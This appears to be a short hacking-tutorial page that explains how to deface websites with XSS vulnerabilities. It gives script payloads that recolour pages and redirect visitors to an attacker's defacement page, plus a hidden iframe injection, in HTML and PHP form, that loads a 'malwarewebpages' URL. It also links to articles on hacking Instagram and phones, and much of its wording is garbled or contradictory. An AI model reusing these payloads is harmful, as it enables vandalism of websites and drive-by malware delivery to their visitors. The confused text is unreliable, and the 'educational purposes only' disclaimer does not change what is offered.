How To Deface a Website ?

Deface a Website With Cross Site Scripting

it will work on sites with an XSS vulnerability.

Defending is one of the most common cases where a hacker finds a vulnerability on a website.

Defacing changes the content of the site to hackers.

In most cases, an attacker uses this method to report a vulnerability to an administrator.

But that’s a bad idea ..!

Also Read  How To Hack Instagram Using Zphisher ?

Here are some of the easiest ways to protect websites from XSS vulnerabilities.

Change The Background Color Of a Website


use this in your target website like<script&...y.bgColor="red";</script>

Change The Background Image Of A Website


Defacement Page

First Of All Upload The Distorted (HTML) Page To And Get The Link.

When You Find A Vulnerable XSS Site, Paste The Script.


This script will redirect the page to the paste HTML error page.

You can only remove persistent vulnerable XSS sites.

Also Read  How To Hack Phone Using SMS ?

Defacing with iframe Injection

<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages :

echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;


These Are Some Of The Simple Methods To Deface An XSS-affected Page.

This Will Be For Beginners. However, There Are Other Ways To Screw Things Up.

Never Use This Technique. This Is For Educational Purposes Only. We Are Not Responsible For Any Incorrect Use. Try Your Own Risk.